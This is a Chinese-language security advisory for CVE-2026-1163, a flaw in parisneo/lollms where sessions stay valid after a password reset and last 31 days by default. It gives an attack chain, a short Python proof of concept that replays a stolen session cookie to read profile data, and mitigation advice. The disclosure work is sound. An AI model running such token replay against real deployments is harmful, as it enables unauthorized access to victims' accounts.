CVE-2026-1163 CVSS 4.1 中危

CVE-2026-1163 lollms会话过期不足漏洞

披露日期: 2026-04-08

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-1163

漏洞类型

会话管理缺陷

CVSS评分

4.1 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

parisneo/lollms

漏洞概述

parisneo/lollms最新版本中存在会话过期不足漏洞。应用程序在密码重置后未能使活动会话失效，且缺乏不活动后的请求拒绝逻辑，默认会话时长过长（31天）。攻击者可在受害者重置密码后继续使用旧会话令牌维持对受损账户的持久访问。

技术细节

该漏洞的核心在于parisneo/lollms的会话生命周期管理逻辑缺失。正常的安全机制应要求在敏感操作（如密码重置）后，立即使服务器端所有关联的活动会话失效。然而，该应用未实现此逻辑，同时默认配置了长达31天的会话有效期且未设置不活动超时。攻击者一旦获取到有效的会话令牌（Session ID或Cookie），即便合法用户已经修改了密码以阻断访问，攻击者持有的旧令牌依然被视为有效凭证。这导致攻击者可以绕过身份验证机制，长期维持对目标账户的未授权访问，严重威胁用户数据安全和隐私。

攻击链分析

STEP 1

1. 会话窃取

攻击者通过XSS、中间人攻击或其他方式获取受害者的有效会话令牌。

STEP 2

2. 密码重置

受害者察觉账户异常或主动进行安全维护，通过正常流程重置了账户密码。

STEP 3

3. 重放攻击

攻击者使用窃取的旧会话令牌向服务器发送请求。

STEP 4

4. 维持访问

服务器验证旧令牌有效（未在重置密码时撤销），允许攻击者访问账户。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Conceptual PoC for CVE-2026-1163
# This script demonstrates that an old session token remains valid after a password reset.

target_url = "http://target-lollms-instance/api/user/profile"
# Old session token obtained before password reset
stolen_session_cookie = {"session_id": "attacker_stolen_token_value_12345"}

def check_session_validity():
    response = requests.get(target_url, cookies=stolen_session_cookie)
    if response.status_code == 200:
        print("[+] Exploit Successful: Old session token is still valid after password reset.")
        print("[+] User Data:", response.text)
    else:
        print("[-] Exploit Failed: Session invalidated.")

if __name__ == "__main__":
    check_session_validity()

影响范围

parisneo/lollms (最新版本)

防御指南

临时缓解措施

临时缓解措施包括管理员在后台手动强制终止所有用户会话，以及用户在使用公共设备后务必主动点击“退出登录”。建议开发者尽快审查会话管理代码，确保密码变更操作会触发全局会话失效。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表